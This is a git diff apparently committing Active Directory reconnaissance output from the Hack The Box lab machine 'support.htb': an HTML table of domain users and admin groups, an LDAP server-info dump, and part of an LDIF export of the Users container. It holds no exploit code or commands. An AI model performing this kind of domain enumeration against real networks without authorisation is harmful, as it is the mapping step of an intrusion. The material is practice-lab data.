+<tr><td>bardot.mary</td><td>bardot.mary</td><td>bardot.mary</td><td>05/28/22 11:14:08</td><td>05/28/22 11:14:09</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:14:08</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1113">1113</abbr></td><td>&nbsp;</td></tr>
+<tr><td>raven.clifton</td><td>raven.clifton</td><td>raven.clifton</td><td>05/28/22 11:13:52</td><td>05/28/22 11:13:53</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:53</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1112">1112</abbr></td><td>&nbsp;</td></tr>
+<tr><td>levine.leopoldo</td><td>levine.leopoldo</td><td>levine.leopoldo</td><td>05/28/22 11:13:37</td><td>05/28/22 11:13:38</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:37</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1111">1111</abbr></td><td>&nbsp;</td></tr>
+<tr><td>thomas.raphael</td><td>thomas.raphael</td><td>thomas.raphael</td><td>05/28/22 11:13:21</td><td>05/28/22 11:13:22</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:21</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1110">1110</abbr></td><td>&nbsp;</td></tr>
+<tr><td>anderson.damian</td><td>anderson.damian</td><td>anderson.damian</td><td>05/28/22 11:13:05</td><td>05/28/22 11:13:06</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:13:05</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1109">1109</abbr></td><td>&nbsp;</td></tr>
+<tr><td>wilson.shelby</td><td>wilson.shelby</td><td>wilson.shelby</td><td>05/28/22 11:12:50</td><td>05/28/22 11:12:51</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:50</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1108">1108</abbr></td><td>&nbsp;</td></tr>
+<tr><td>hernandez.stanley</td><td>hernandez.stanley</td><td>hernandez.stanley</td><td>05/28/22 11:12:34</td><td>05/28/22 11:12:35</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:34</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1107">1107</abbr></td><td>&nbsp;</td></tr>
+<tr><td>smith.rosario</td><td>smith.rosario</td><td>smith.rosario</td><td>05/28/22 11:12:19</td><td>05/28/22 11:12:19</td><td>01/01/01 00:00:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:19</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1106">1106</abbr></td><td>&nbsp;</td></tr>
+<tr><td>support</td><td>support</td><td>support</td><td>05/28/22 11:12:00</td><td>08/19/22 13:47:57</td><td>08/19/22 14:44:55</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:00</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1105">1105</abbr></td><td>&nbsp;</td></tr>
+<tr><td>ldap</td><td>ldap</td><td>ldap</td><td>05/28/22 11:11:46</td><td>08/19/22 13:02:01</td><td>08/19/22 14:53:00</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:11:46</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1104">1104</abbr></td><td>&nbsp;</td></tr>
+<tr><td>krbtgt</td><td>krbtgt</td><td>krbtgt</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>01/01/01 00:00:00</td><td>ACCOUNT_DISABLED, NORMAL_ACCOUNT</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-502">502</abbr></td><td>Key Distribution Center Service Account</td></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Shared_Support_Accounts">Shared Support Accounts</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>support</td><td>support</td><td>support</td><td>05/28/22 11:12:00</td><td>08/19/22 13:47:57</td><td>08/19/22 14:44:55</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:00</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1105">1105</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Remote_Management_Users">Remote Management Users</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>support</td><td>support</td><td>support</td><td>05/28/22 11:12:00</td><td>08/19/22 13:47:57</td><td>08/19/22 14:44:55</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:12:00</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1105">1105</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Denied_RODC_Password_Replication_Group">Denied RODC Password Replication Group</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>krbtgt</td><td>krbtgt</td><td>krbtgt</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>01/01/01 00:00:00</td><td>ACCOUNT_DISABLED, NORMAL_ACCOUNT</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-502">502</abbr></td><td>Key Distribution Center Service Account</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Read-only_Domain_Controllers" title="Read-only Domain Controllers">Read-only Domain Controllers</a></td><td>Read-only Domain Controllers</td><td>Read-only Domain Controllers</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-521">521</abbr></td><td>Members of this group are Read-Only Domain Controllers in the domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Group_Policy_Creator_Owners" title="Group Policy Creator Owners">Group Policy Creator Owners</a></td><td>Group Policy Creator Owners</td><td>Group Policy Creator Owners</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-520">520</abbr></td><td>Members in this group can modify group policy for the domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Domain_Admins" title="Domain Admins">Domain Admins</a></td><td>Domain Admins</td><td>Domain Admins</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-512">512</abbr></td><td>Designated administrators of the domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Cert_Publishers" title="Cert Publishers">Cert Publishers</a></td><td>Cert Publishers</td><td>Cert Publishers</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-517">517</abbr></td><td>Members of this group are permitted to publish certificates to the directory</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Enterprise_Admins" title="Enterprise Admins">Enterprise Admins</a></td><td>Enterprise Admins</td><td>Enterprise Admins</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-519">519</abbr></td><td>Designated administrators of the enterprise</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Schema_Admins" title="Schema Admins">Schema Admins</a></td><td>Schema Admins</td><td>Schema Admins</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-518">518</abbr></td><td>Designated administrators of the schema</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Domain_Controllers" title="Domain Controllers">Domain Controllers</a></td><td>Domain Controllers</td><td>Domain Controllers</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-516">516</abbr></td><td>All domain controllers in the domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Guests">Guests</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Guest</td><td>Guest</td><td>Guest</td><td>05/28/22 11:01:56</td><td>08/19/22 06:15:24</td><td>01/01/01 00:00:00</td><td>PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:18:55</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-501">501</abbr></td><td>Built-in account for guest access to the computer/domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Domain_Guests" title="Domain Guests">Domain Guests</a></td><td>Domain Guests</td><td>Domain Guests</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-514">514</abbr></td><td>All domain guests</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Domain_Guests">Domain Guests</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Guest</td><td>Guest</td><td>Guest</td><td>05/28/22 11:01:56</td><td>08/19/22 06:15:24</td><td>01/01/01 00:00:00</td><td>PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>05/28/22 11:18:55</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-501">501</abbr></td><td>Built-in account for guest access to the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Group_Policy_Creator_Owners">Group Policy Creator Owners</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Domain_Admins">Domain Admins</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Enterprise_Admins">Enterprise Admins</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Schema_Admins">Schema Admins</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Administrators">Administrators</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr><td>Administrator</td><td>Administrator</td><td>Administrator</td><td>05/28/22 11:01:56</td><td>08/19/22 04:32:27</td><td>08/19/22 04:32:50</td><td>NORMAL_ACCOUNT</td><td>07/19/22 17:55:56</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-500">500</abbr></td><td>Built-in account for administering the computer/domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Domain_Admins" title="Domain Admins">Domain Admins</a></td><td>Domain Admins</td><td>Domain Admins</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-512">512</abbr></td><td>Designated administrators of the domain</td></tr>
+<tr class="group"><td>Group: <a href="#cn_Enterprise_Admins" title="Enterprise Admins">Enterprise Admins</a></td><td>Enterprise Admins</td><td>Enterprise Admins</td><td>05/28/22 11:03:43</td><td>05/28/22 11:19:47</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-519">519</abbr></td><td>Designated administrators of the enterprise</td></tr>
+</tbody>
+<thead><tr><td colspan="10" id="cn_Users">Users</td></tr></thead><tbody><tr><th>CN</th><th>name</th><th>SAM Name</th><th>Created on</th><th>Changed on</th><th>lastLogon</th><th>Flags</th><th>pwdLastSet</th><th>SID</th><th>description</th></tr>
+<tr class="group"><td>Group: <a href="#cn_Domain_Users" title="Domain Users">Domain Users</a></td><td>Domain Users</td><td>Domain Users</td><td>05/28/22 11:03:43</td><td>05/28/22 11:03:43</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-513">513</abbr></td><td>All domain users</td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/ldap_server_info b/support/ldap_server_info
new file mode 100644
index 0000000..7da73a5
--- /dev/null
+++ b/support/ldap_server_info
@@ -0,0 +1,118 @@
+DSA info (from DSE):
+ Supported LDAP versions: 3, 2
+ Naming contexts:
+ DC=support,DC=htb
+ CN=Configuration,DC=support,DC=htb
+ CN=Schema,CN=Configuration,DC=support,DC=htb
+ DC=DomainDnsZones,DC=support,DC=htb
+ DC=ForestDnsZones,DC=support,DC=htb
+ Supported controls:
+ 1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT
+ 1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT
+ 1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT
+ 1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT
+ 1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
+ 1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT
+ 1.2.840.113556.1.4.1852 - User quota - Control - MICROSOFT
+ 1.2.840.113556.1.4.1907 - Server shutdown notify - Control - MICROSOFT
+ 1.2.840.113556.1.4.1948 - Range retrieval no error - Control - MICROSOFT
+ 1.2.840.113556.1.4.1974 - Server force update - Control - MICROSOFT
+ 1.2.840.113556.1.4.2026 - Input DN - Control - MICROSOFT
+ 1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT
+ 1.2.840.113556.1.4.2065 - Show deactivated link - Control - MICROSOFT
+ 1.2.840.113556.1.4.2066 - Policy hints [DEPRECATED] - Control - MICROSOFT
+ 1.2.840.113556.1.4.2090 - DirSync EX - Control - MICROSOFT
+ 1.2.840.113556.1.4.2204 - Tree deleted EX - Control - MICROSOFT
+ 1.2.840.113556.1.4.2205 - Updates stats - Control - MICROSOFT
+ 1.2.840.113556.1.4.2206 - Search hints - Control - MICROSOFT
+ 1.2.840.113556.1.4.2211 - Expected entry count - Control - MICROSOFT
+ 1.2.840.113556.1.4.2239 - Policy hints - Control - MICROSOFT
+ 1.2.840.113556.1.4.2255 - Set owner - Control - MICROSOFT
+ 1.2.840.113556.1.4.2256 - Bypass quota - Control - MICROSOFT
+ 1.2.840.113556.1.4.2309
+ 1.2.840.113556.1.4.2330
+ 1.2.840.113556.1.4.2354
+ 1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696
+ 1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT
+ 1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891
+ 1.2.840.113556.1.4.474 - Sort Response - Control - RFC2891
+ 1.2.840.113556.1.4.521 - Cross-domain move - Control - MICROSOFT
+ 1.2.840.113556.1.4.528 - Server search notification - Control - MICROSOFT
+ 1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT
+ 1.2.840.113556.1.4.619 - Lazy commit - Control - MICROSOFT
+ 1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
+ 1.2.840.113556.1.4.802 - Range option - Control - MICROSOFT
+ 1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT
+ 1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT
+ 1.2.840.113556.1.4.970 - Get stats - Control - MICROSOFT
+ 2.16.840.1.113730.3.4.10 - Virtual List View Response - Control - IETF
+ 2.16.840.1.113730.3.4.9 - Virtual List View Request - Control - IETF
+ Supported extensions:
+ 1.2.840.113556.1.4.1781 - Fast concurrent bind - Extension - MICROSOFT
+ 1.2.840.113556.1.4.2212 - Batch request - Extension - MICROSOFT
+ 1.3.6.1.4.1.1466.101.119.1 - Dynamic Refresh - Extension - RFC2589
+ 1.3.6.1.4.1.1466.20037 - StartTLS - Extension - RFC4511-RFC4513
+ 1.3.6.1.4.1.4203.1.11.3 - Who am I - Extension - RFC4532
+ Supported features:
+ 1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT
+ 1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT
+ 1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT
+ 1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT
+ 1.2.840.113556.1.4.2237 - Active directory W8 - Feature - MICROSOFT
+ 1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT
+ Supported SASL mechanisms:
+ GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5
+ Schema entry:
+ CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
+Other:
+ domainFunctionality:
+ 7
+ forestFunctionality:
+ 7
+ domainControllerFunctionality:
+ 7
+ rootDomainNamingContext:
+ DC=support,DC=htb
+ ldapServiceName:
+ support.htb:dc$@SUPPORT.HTB
+ isGlobalCatalogReady:
+ TRUE
+ supportedLDAPPolicies:
+ MaxPoolThreads
+ MaxPercentDirSyncRequests
+ MaxDatagramRecv
+ MaxReceiveBuffer
+ InitRecvTimeout
+ MaxConnections
+ MaxConnIdleTime
+ MaxPageSize
+ MaxBatchReturnMessages
+ MaxQueryDuration
+ MaxDirSyncDuration
+ MaxTempTableSize
+ MaxResultSetSize
+ MinResultSets
+ MaxResultSetsPerConn
+ MaxNotificationPerConn
+ MaxValRange
+ MaxValRangeTransitive
+ ThreadMemoryLimit
+ SystemMemoryLimitPercent
+ serverName:
+ CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
+ schemaNamingContext:
+ CN=Schema,CN=Configuration,DC=support,DC=htb
+ isSynchronized:
+ TRUE
+ highestCommittedUSN:
+ 82007
+ dsServiceName:
+ CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
+ dnsHostName:
+ dc.support.htb
+ defaultNamingContext:
+ DC=support,DC=htb
+ currentTime:
+ 20220819094016.0Z
+ configurationNamingContext:
+ CN=Configuration,DC=support,DC=htb
diff --git a/support/output b/support/output
new file mode 100644
index 0000000..e27361e
--- /dev/null
+++ b/support/output
@@ -0,0 +1,1400 @@
+# extended LDIF
+#
+# LDAPv3
+# base <CN=Users,DC=support,DC=htb> with scope subtree
+# filter: (objectclass=*)
+# requesting: ALL
+#
+
+# Users, support.htb
+dn: CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: container
+cn: Users
+description: Default container for upgraded user accounts
+distinguishedName: CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110155.0Z
+whenChanged: 20220528110155.0Z
+uSNCreated: 5660
+uSNChanged: 5660
+showInAdvancedViewOnly: FALSE
+name: Users
+objectGUID:: fvT3rPs5nUaComz/MQQwrw==
+systemFlags: -1946157056
+objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# krbtgt, Users, support.htb
+dn: CN=krbtgt,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: krbtgt
+description: Key Distribution Center Service Account
+distinguishedName: CN=krbtgt,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12324
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 13087
+showInAdvancedViewOnly: TRUE
+name: krbtgt
+objectGUID:: /xb62J8VtUOrxKFMpoVR1g==
+userAccountControl: 514
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982094237626330
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL9gEAAA==
+adminCount: 1
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: krbtgt
+sAMAccountType: 805306368
+servicePrincipalName: kadmin/changepw
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+msDS-SupportedEncryptionTypes: 0
+
+# Domain Computers, Users, support.htb
+dn: CN=Domain Computers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Domain Computers
+description: All workstations and servers joined to the domain
+distinguishedName: CN=Domain Computers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12330
+uSNChanged: 12332
+name: Domain Computers
+objectGUID:: FIrWiW7Kr0GFu2diC0RPew==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILAwIAAA==
+sAMAccountName: Domain Computers
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Domain Controllers, Users, support.htb
+dn: CN=Domain Controllers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Domain Controllers
+description: All domain controllers in the domain
+distinguishedName: CN=Domain Controllers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12333
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 13088
+name: Domain Controllers
+objectGUID:: dN6L6IBw9kCwkCFFY6rSWg==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILBAIAAA==
+adminCount: 1
+sAMAccountName: Domain Controllers
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Schema Admins, Users, support.htb
+dn: CN=Schema Admins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Schema Admins
+description: Designated administrators of the schema
+member: CN=Administrator,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Schema Admins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12336
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 13074
+name: Schema Admins
+objectGUID:: t4lVcdkLMU+XgbSieUBxbQ==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILBgIAAA==
+adminCount: 1
+sAMAccountName: Schema Admins
+sAMAccountType: 268435456
+groupType: -2147483640
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Enterprise Admins, Users, support.htb
+dn: CN=Enterprise Admins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Enterprise Admins
+description: Designated administrators of the enterprise
+member: CN=Administrator,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Enterprise Admins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12339
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+memberOf: CN=Administrators,CN=Builtin,DC=support,DC=htb
+uSNChanged: 13073
+name: Enterprise Admins
+objectGUID:: q3daaBUIyEaH519un0AO1A==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILBwIAAA==
+adminCount: 1
+sAMAccountName: Enterprise Admins
+sAMAccountType: 268435456
+groupType: -2147483640
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Cert Publishers, Users, support.htb
+dn: CN=Cert Publishers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Cert Publishers
+description: Members of this group are permitted to publish certificates to th
+ e directory
+distinguishedName: CN=Cert Publishers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12342
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 12344
+name: Cert Publishers
+objectGUID:: PAzQuO/hA0qzHxyiYOc4jw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILBQIAAA==
+sAMAccountName: Cert Publishers
+sAMAccountType: 536870912
+groupType: -2147483644
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Domain Admins, Users, support.htb
+dn: CN=Domain Admins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Domain Admins
+description: Designated administrators of the domain
+member: CN=Administrator,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Domain Admins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12345
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+memberOf: CN=Administrators,CN=Builtin,DC=support,DC=htb
+uSNChanged: 13069
+name: Domain Admins
+objectGUID:: TwvrOpHMLUyAW0q4RHRefQ==
